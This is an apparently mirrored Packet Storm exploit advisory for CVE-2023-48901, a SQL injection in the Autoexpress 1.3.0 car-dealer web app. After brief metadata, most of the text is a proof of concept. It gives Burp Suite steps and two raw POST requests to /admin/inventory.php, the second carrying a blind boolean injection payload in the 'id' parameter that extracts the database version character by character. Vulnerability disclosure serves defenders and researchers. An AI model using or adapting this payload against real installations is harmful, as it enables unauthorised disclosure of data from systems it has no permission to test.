Tramyardg Autoexpress 1.3.0 SQL Injection
2024-3-19 23:41:13 Author: packetstormsecurity.com(查看原文) 阅读量:5 收藏

# Exploit Title: tramyardg autoexpress - SQL Injection
# Google Dork: N/A
# Date: 11/28/2023
# Exploit Author: Scott White
# Vendor Homepage: https://github.com/tramyardg/autoexpress
# Version: v1.3.0
# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52
# CVE : CVE-2023-48901

# References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48901
https://www.cve.org/CVERecord?id=CVE-2023-48901

# Description:
Autoexpress 1.3.0 allows SQL Injection via parameter 'carId' in /autoexpress/details.php and /autoexpress/admin/inventory.php. This vulnerability allows remote attackers to disclose sensitive information on affected installations.

# Proof of Concept:
+ Go to "http://localhost/autoexpress/admin/sign-in.php"
+ Sign in with Admin credentials
+ Click "Manage Inventory" --> "Actions" --> "Manage Photos" while having the "Intercept On" Burp Suite
+ Should receive a request of POST - /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=[ID]
+ Send it to Repeater
+ Captured Burp Request:

POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3 HTTP/1.1
Host: localhost
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Referer: http://localhost/autoexpress/admin/inventory.php?username=admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=PHPSESSIONID
Connection: close

# Sample Request
POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3+and+(ascii(substring((select+version()),1,1)))+%3d+56 HTTP/1.1
Host: localhost
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Referer: http://localhost/autoexpress/admin/inventory.php?username=admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=PHPSESSIONID
Connection: close


文章来源: https://packetstormsecurity.com/files/177660/autoexpress130-sql.txt
如有侵权请联系:admin#unsafe.sh